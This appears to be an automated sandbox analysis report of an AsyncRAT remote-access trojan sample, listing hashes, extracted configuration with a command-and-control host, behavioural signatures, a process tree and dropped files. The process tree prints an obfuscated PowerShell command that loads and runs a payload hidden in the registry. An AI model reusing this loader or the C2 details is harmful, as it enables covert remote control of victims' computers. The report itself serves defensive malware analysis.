Overview

overview

10

Static

static

3

batch.exe

windows7-x64

10

batch.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    30s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    13-07-2024 04:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    batch.exe

  • Size

    194KB

  • MD5

    5cd0d1cc05f646037164ab9fceacf995

  • SHA1

    1eab49d606689ac01f2423441a553ec829854a65

  • SHA256

    342fda83ad4d56696ec349715775d5b6f5b3bbb46e57918b9e7b458c75be2a87

  • SHA512

    4b755c993531a95cf51362607b78b0fee15ffe133a0951d1e9f18582d8092c99a7fbe30679d8b2279d5cecfeb09291e4e053dd7bacd884a644976193348ba37e

  • SSDEEP

    3072:96Up6fIk/wZypP/9F/ix/A9wXnDLn1mFbTYGtdGt3WzZb29b/zSLpSoSE:96Wd6/9FO/AmL1mFbckdGtmzYR/zAc

Score
10/10
asyncrat!dead code tool'srat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

!DEAD CODE TOOL'S

C2

chapter-designated.gl.at.ply.gg:27729

Mutex

!DEADCODEMutex_lm.deadcode

Attributes
  • delay

    3

  • install

    false

  • install_file

    svchost.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 1 IoCs
    rat
  • Executes dropped EXE 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{a85d6e6d-3698-4657-9236-8f295fe5c8db}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2760
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:476
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:608
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1440
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe
                3⤵
                  PID:540
                • C:\Windows\system32\wbem\wmiprvse.exe
                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  3⤵
                    PID:1264
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k RPCSS
                  2⤵
                    PID:676
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                    2⤵
                      PID:748
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                      2⤵
                        PID:812
                        • C:\Windows\system32\Dwm.exe
                          "C:\Windows\system32\Dwm.exe"
                          3⤵
                            PID:1160
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs
                          2⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:864
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {584905D7-A862-426D-BA77-A39E2905DB35} S-1-5-18:NT AUTHORITY\System:Service:
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2876
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](68)+''+[Char](101)+'ad'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                              4⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2900
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService
                          2⤵
                            PID:984
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k NetworkService
                            2⤵
                              PID:272
                            • C:\Windows\System32\spoolsv.exe
                              C:\Windows\System32\spoolsv.exe
                              2⤵
                                PID:328
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                                2⤵
                                  PID:1072
                                • C:\Windows\system32\taskhost.exe
                                  "taskhost.exe"
                                  2⤵
                                    PID:1112
                                  • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                    "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                    2⤵
                                      PID:1692
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                      2⤵
                                        PID:2280
                                      • C:\Windows\system32\sppsvc.exe
                                        C:\Windows\system32\sppsvc.exe
                                        2⤵
                                          PID:2452
                                      • C:\Windows\system32\lsass.exe
                                        C:\Windows\system32\lsass.exe
                                        1⤵
                                          PID:488
                                        • C:\Windows\system32\lsm.exe
                                          C:\Windows\system32\lsm.exe
                                          1⤵
                                            PID:496
                                          • C:\Windows\Explorer.EXE
                                            C:\Windows\Explorer.EXE
                                            1⤵
                                            • Suspicious behavior: GetForegroundWindowSpam
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1196
                                            • C:\Users\Admin\AppData\Local\Temp\batch.exe
                                              "C:\Users\Admin\AppData\Local\Temp\batch.exe"
                                              2⤵
                                              • Drops file in System32 directory
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:2532
                                              • C:\Windows\System32\DeadSecRootKit.exe
                                                "C:\Windows\System32\DeadSecRootKit.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2752
                                              • C:\Windows\System32\DeadClient.exe
                                                "C:\Windows\System32\DeadClient.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                PID:2844
                                          • C:\Windows\system32\conhost.exe
                                            \??\C:\Windows\system32\conhost.exe "138669702-16829183118572019522638494791906237127841555697-2136218637-669668812"
                                            1⤵
                                              PID:2784

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Windows\System32\DeadClient.exe
                                              Filesize

                                              63KB

                                              MD5

                                              f33086a386dd46cf6148beb6e6a6214b

                                              SHA1

                                              1235a154fdcd0e2724768c822778a9ba044bd47e

                                              SHA256

                                              3adccf5f76f998c0481d3e4d8a6535b6f27aa4fc30d213df66aa6256d891a08b

                                              SHA512

                                              677ac48b6b5cbe3465a6533af00d877f610b91ee2aa2c0e505c9d711b831b57cbbfdd73681b699065d3e5e89907e87ad9b5ce20e58c741a826237e3dcefda251

                                              Download Submit

                                            • C:\Windows\System32\DeadSecRootKit.exe
                                              Filesize

                                              151KB

                                              MD5

                                              b8479a23c22cf6fc456e197939284069

                                              SHA1

                                              b2d98cc291f16192a46f363d007e012d45c63300

                                              SHA256

                                              18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

                                              SHA512

                                              786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

                                              Download Submit

                                            • memory/432-44-0x000007FEBEB40000-0x000007FEBEB50000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/432-37-0x0000000000C40000-0x0000000000C67000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/432-43-0x0000000000C40000-0x0000000000C67000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/432-36-0x0000000000C40000-0x0000000000C67000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/432-45-0x00000000375D0000-0x00000000375E0000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/432-33-0x0000000000C10000-0x0000000000C32000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/432-35-0x0000000000C10000-0x0000000000C32000-memory.dmp

                                              Filesize

                                              136KB

                                              Download

                                            • memory/476-57-0x0000000000060000-0x0000000000087000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/476-51-0x0000000000060000-0x0000000000087000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/476-58-0x000007FEBEB40000-0x000007FEBEB50000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/476-59-0x00000000375D0000-0x00000000375E0000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/488-73-0x00000000375D0000-0x00000000375E0000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/488-65-0x0000000000220000-0x0000000000247000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/488-71-0x0000000000220000-0x0000000000247000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/488-72-0x000007FEBEB40000-0x000007FEBEB50000-memory.dmp

                                              Filesize

                                              64KB

                                              Download

                                            • memory/496-79-0x0000000000950000-0x0000000000977000-memory.dmp

                                              Filesize

                                              156KB

                                              Download

                                            • memory/2532-0-0x000007FEF5903000-0x000007FEF5904000-memory.dmp

                                              Filesize

                                              4KB

                                              Download

                                            • memory/2532-16-0x000007FEF5900000-0x000007FEF62EC000-memory.dmp

                                              Filesize

                                              9.9MB

                                              Download

                                            • memory/2532-2-0x000007FEF5900000-0x000007FEF62EC000-memory.dmp

                                              Filesize

                                              9.9MB

                                              Download

                                            • memory/2532-1-0x0000000000DA0000-0x0000000000DD6000-memory.dmp

                                              Filesize

                                              216KB

                                              Download

                                            • memory/2760-25-0x0000000140000000-0x0000000140008000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2760-28-0x0000000077590000-0x0000000077739000-memory.dmp

                                              Filesize

                                              1.7MB

                                              Download

                                            • memory/2760-29-0x0000000077470000-0x000000007758F000-memory.dmp

                                              Filesize

                                              1.1MB

                                              Download

                                            • memory/2760-30-0x0000000140000000-0x0000000140008000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2760-23-0x0000000140000000-0x0000000140008000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2760-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2760-27-0x0000000140000000-0x0000000140008000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2760-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2844-15-0x0000000001220000-0x0000000001236000-memory.dmp

                                              Filesize

                                              88KB

                                              Download

                                            • memory/2900-20-0x0000000077590000-0x0000000077739000-memory.dmp

                                              Filesize

                                              1.7MB

                                              Download

                                            • memory/2900-17-0x000000001A130000-0x000000001A412000-memory.dmp

                                              Filesize

                                              2.9MB

                                              Download

                                            • memory/2900-18-0x00000000009D0000-0x00000000009D8000-memory.dmp

                                              Filesize

                                              32KB

                                              Download

                                            • memory/2900-19-0x0000000001410000-0x0000000001438000-memory.dmp

                                              Filesize

                                              160KB

                                              Download

                                            • memory/2900-21-0x0000000077470000-0x000000007758F000-memory.dmp

                                              Filesize

                                              1.1MB

                                              Download